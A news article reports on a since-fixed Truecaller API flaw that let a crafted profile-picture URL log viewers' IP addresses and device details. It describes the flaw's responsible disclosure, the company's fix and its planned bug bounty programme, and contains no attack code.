Truecaller has fixed a flaw that could allow attackers to use the service's API to place a malicious link as the URL for their profile picture. The malicious link could be used to fetch IP addresses of other Truecaller users and perform attacks such as brute-force and distributed denial of service (DDoS), based on the obtained information. Further, the flaw could potentially enable the attackers to harvest IP addresses of users and scan for open ports. To exploit the flaw and attack a Truecaller user, a malicious party just had to lure a user to an infected profile.
The flaw existed in one of the APIs of Truecaller that allowed attackers to place their malicious links as the URL for a profile picture. Bengaluru-based security researcher Ehraz Ahmed discovered the Truecaller flaw and showed a proof-of-concept (PoC) to Gadgets 360. Upon confirming the exploit was real, Gadgets 360 brought the flaw to Truecaller's attention and connected the company with the researcher. We then responsibly waited until the company had fixed the issue before publishing this article.
Attackers leveraging the flaw could fetch the IP addresses of users and silently obtain their location as well as device details. Because it was an API flaw, it could be accessed through all versions of Truecaller, including Android, iOS, and the Web.
Once IP address and other user data have been obtained through the flaw, an attacker could ascertain location details to track users viewing their profiles. The vulnerability could also be exploited to scan for open ports after accessing IP addresses to perform brute-force and DDoS attacks.
"Whenever a user views the attacker's profile on Truecaller -- either by doing a search or tapping the pop-up from a call, the custom script gets executed and user's IP address gets recorded," explains Ahmed, adding that the user wouldn't notice any difference as the profile URL is not displayed publicly.
To reproduce the flaw, Ahmed developed the PoC showing the process of recording IP addresses of users in a log file. The custom PHP script used by the security researcher worked with both IPv4 and IPv6 based IP addresses. Gadgets 360 was also able to verify the scope of the vulnerability by testing it through multiple Android and iPhone models. The custom script was able to obtain IP addresses of the devices alongside highlighting their model numbers and software versions.
In case if a user is searching for a Truecaller profile from a desktop, the flaw could let an attacker know about browser details. To showcase the extent of the flaw existing in Truecaller, Ahmed has created a video and published a case study.
"It was recently brought to our attention that there was a small bug in our app services which allowed the modification of one's own profile in an unintended way," Truecaller said in a statement to Gadgets 360. "We thank the security researcher for bringing this to our notice and collaborating with us. The bug was immediately fixed."
Truecaller also revealed that it is set to launch a bug bounty programme to reward security researchers reporting flaws in its system in the future.
"We, at Truecaller, are humbled to welcome all contributions from the security research community. We have partnered with a community of researchers and will shortly announce a bounty program where we, as a transparent and responsible organisation, will also reward researchers for their contributions," the company stated.
As of September this year, Truecaller has over 150 million daily active users globally. The Truecaller app also earlier this year crossed the mark of 500 million downloads and surpassed the milestone of one million Premium subscribers worldwide.
Truecaller is largely popular for its caller ID and call blocking features. Nevertheless, the app does offer Voice-over-Internet-Protocol (VoIP) based voice calling support and UPI-powered payments service to counter WhatsApp. Truecaller in April also tied up with Bengaluru-headquartered RedBus to start offering bus ticket booking service to its users in India.